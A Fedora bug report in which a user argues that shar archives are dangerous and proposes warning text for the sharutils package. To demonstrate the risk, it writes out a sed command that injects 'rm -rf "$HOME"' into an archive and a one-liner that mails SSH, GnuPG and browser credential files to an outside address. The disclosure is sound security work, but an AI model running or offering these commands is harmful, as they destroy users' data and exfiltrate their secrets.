Bug 171865 - sharutils: outdated package description, unshar
sharutils: outdated package description, unshar
Status: CLOSED CURRENTRELEASE
Product: Fedora
Classification: Fedora
Component: sharutils (Show other bugs)
4
All Linux
medium Severity medium
: ---
: ---
Assigned To: Ngo Than
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2005-10-27 04:50 EDT by Craig Ringer
Modified: 2007-11-30 17:11 EST (History)
0 users

See Also:
Fixed In Version: FC6
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2007-04-13 12:38:26 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Craig Ringer 2005-10-27 04:50:04 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7

Description of problem:
Yum recommends that users install sharutils "if you send binary files through mail". The package description notes that email is "problematic for regular binary files".

Since shar is deeply scary from a security point of view, and mail clients and servers that break on binary are pretty rare now (and are better worked around using base64 or even uuencode), I think this might benefit from a change. I'm not at all convinced that `unshar' is a tool that it's even a good idea to have on a modern UNIX, given that it's design purpose appears to be running code from remote, possibly untrusted, sources.

Consider:

echo "test file" > test
shar test > test.shar
sed -i 's/exit 0/rm -rf "$HOME"; exit 0/g' test.shar

and the resulting "fun" for the user who runs the file or uses `unshar' to extract it. Don't try that in a user account with data you care about. Also consider what could be accomplished with:

tar cf - 2>/dev/null .ssh .gnupg .mozilla/firefox/*.default/*.db .evolution/*.db  \ | gzip | mail -s "sucker" "my-addr@gmail.com"

or a little script to try to extract some email addresses from common clients and mail its self out. A big risk? Not really - many people won't even know what to do with shar archives now. At least FC4 defaults to opening them with a text editor (tested in evo, thunderbird).

Perhaps this package description might be better:

"The sharutils package contains the GNU shar utilities, a set of tools
for encoding and decoding packages of files (in binary or text format)
in a special plain text format called shell archives (shar). The shar
format has now been largely superceded by base64-encoded MIME for sending
binaries through email, its most common use.

WARNING WARNING WARNING

The shar format has some serious inherent security problems, given that extracting an archive involves running whatever shell code is in the archive, including possibly malicious code. DO NOT EXTRACT SHAR ARCHIVES FROM UNTRUSTED SOURCES. Using unshar instead of just running the archive will not protect you,
as it simply calls out to the shell.

This tool is provided for legacy compatibility only. It's recommended that
you consider alternatives such as the MIME attachment support in `mutt' and
`pine', or a tool like `uudeview' for MIME/Base64 and/or uuencode, in 
preference to using shar."

Also, maybe it's a good idea to patch shar so the comments don't say:

# This is a shell archive (produced by GNU sharutils 4.2.1).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.

but rather

# This is a shell archive (produced by GNU sharutils 4.2.1).
#
# Do not extract this archive if it is not from a source you trust completely,
# or you have read this entire script in detail. Extracting this archive
# involves running a program with permission to do whatever it wants in your
# name, such as deleting your files or sending them to somebody else.
#
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.

Any thoughts?

Version-Release number of selected component (if applicable):
sharutils-4.2.1-27

How reproducible:
Always

Steps to Reproduce:
n/a

Actual Results:  n/a

Expected Results:  n/a

Additional info:
Comment 1 Christian Iseli 2007-01-22 06:59:13 EST
This report targets the FC3 or FC4 products, which have now been EOL'd.

Could you please check that it still applies to a current Fedora release, and
either update the target product or close it ?

Thanks.
Comment 2 Ngo Than 2007-04-13 12:38:26 EDT
fixed in current FC release

Note You need to log in before you can comment on or make changes to this bug.